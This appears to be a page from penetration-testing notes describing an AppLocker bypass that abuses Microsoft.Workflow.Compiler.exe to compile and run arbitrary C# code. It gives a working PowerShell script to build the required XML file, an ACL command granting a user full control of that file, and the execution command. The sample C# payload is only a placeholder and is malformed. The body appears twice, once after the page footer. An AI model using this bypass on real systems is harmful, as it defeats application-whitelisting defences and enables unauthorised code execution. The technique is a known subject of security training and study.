AppLocker Bypass with C#

execute arbitrary C# code via a whitelisted application; our target application must either accept a pre-compiled executable as an argument and load it into memory or compile it itself

Microsoft.Workflow.Compiler

Accepts two arguments. The first must be the path to an XML file containing compiler flags and the path to a file containing C# code.

The second argument is used as a file path, and content is written to it in XML format. Since we only care about obtaining code execution, we can simply pass a random file name as the second command line argument.

The C# file will be compiled and loaded into memory without restrictions.

The downside to this attack is that we must provide both the XML file and the C# code file on disk, and the C# code file will be compiled temporarily to disk as well.

C# code in test.txt

using System;
using System.Workflow.ComponentModel;
public class{
   {
        Console.WriteLine("I executed!");
    }
}

test.txt -> run.xml

$workflowexe = "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\Microsoft.Workflow.Compiler.exe"
$workflowasm = [Reflection.Assembly]::LoadFrom($workflowexe)
$SerializeInputToWrapper = [Microsoft.Workflow.Compiler.CompilerWrapper].GetMethod('SerializeInputToWrapper', [Reflection.BindingFlags] 'NonPublic, Static')
Add-Type -Path 'C:\Windows\Microsoft.NET\Framework64\v4.0.30319\System.Workflow.ComponentModel.dll'
$compilerparam = New-Object -TypeName Workflow.ComponentModel.Compiler.WorkflowCompilerParameters
$compilerparam.GenerateInMemory = $True
$pathvar = "test.txt"
$output = "C:\Tools\run.xml"
$tmp = $SerializeInputToWrapper.Invoke($null, @([Workflow.ComponentModel.Compiler.WorkflowCompilerParameters] $compilerparam, [String[]] @(,$pathvar)))
Move-Item $tmp $output

^ XML file containing compiler flags and the path to a file containing C# code.^

if the XML file is generated from an admin console to avoid AppLocker, need to modify the permission for normal user

grant access to the xml

$Acl = Get-ACL $output;$AccessRule= New-Object System.Security.AccessControl.FileSystemAccessRule(“user”,”FullControl”,”none”,”none","Allow");$Acl.AddAccessRule($AccessRule);Set-Acl $output $Acl

run c# code w/ bypass

C:\Windows\Microsoft.Net\Framework64\v4.0.30319\Microsoft.Workflow.Compiler.exe run.xml results.xml

PreviousPowerShell Language Mode NextAppLocker Bypass with JScript

Last updated 9 months ago

Microsoft.Workflow.Compiler

Accepts two arguments. The first must be the path to an XML file containing compiler flags and the path to a file containing C# code.

The C# file will be compiled and loaded into memory without restrictions.

The downside to this attack is that we must provide both the XML file and the C# code file on disk, and the C# code file will be compiled temporarily to disk as well.

C# code in test.txt

using System;
using System.Workflow.ComponentModel;
public class{
   {
        Console.WriteLine("I executed!");
    }
}

test.txt -> run.xml

$workflowexe = "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\Microsoft.Workflow.Compiler.exe"
$workflowasm = [Reflection.Assembly]::LoadFrom($workflowexe)
$SerializeInputToWrapper = [Microsoft.Workflow.Compiler.CompilerWrapper].GetMethod('SerializeInputToWrapper', [Reflection.BindingFlags] 'NonPublic, Static')
Add-Type -Path 'C:\Windows\Microsoft.NET\Framework64\v4.0.30319\System.Workflow.ComponentModel.dll'
$compilerparam = New-Object -TypeName Workflow.ComponentModel.Compiler.WorkflowCompilerParameters
$compilerparam.GenerateInMemory = $True
$pathvar = "test.txt"
$output = "C:\Tools\run.xml"
$tmp = $SerializeInputToWrapper.Invoke($null, @([Workflow.ComponentModel.Compiler.WorkflowCompilerParameters] $compilerparam, [String[]] @(,$pathvar)))
Move-Item $tmp $output

^ XML file containing compiler flags and the path to a file containing C# code.^

if the XML file is generated from an admin console to avoid AppLocker, need to modify the permission for normal user

grant access to the xml

$Acl = Get-ACL $output;$AccessRule= New-Object System.Security.AccessControl.FileSystemAccessRule(“user”,”FullControl”,”none”,”none","Allow");$Acl.AddAccessRule($AccessRule);Set-Acl $output $Acl

run c# code w/ bypass

C:\Windows\Microsoft.Net\Framework64\v4.0.30319\Microsoft.Workflow.Compiler.exe run.xml results.xml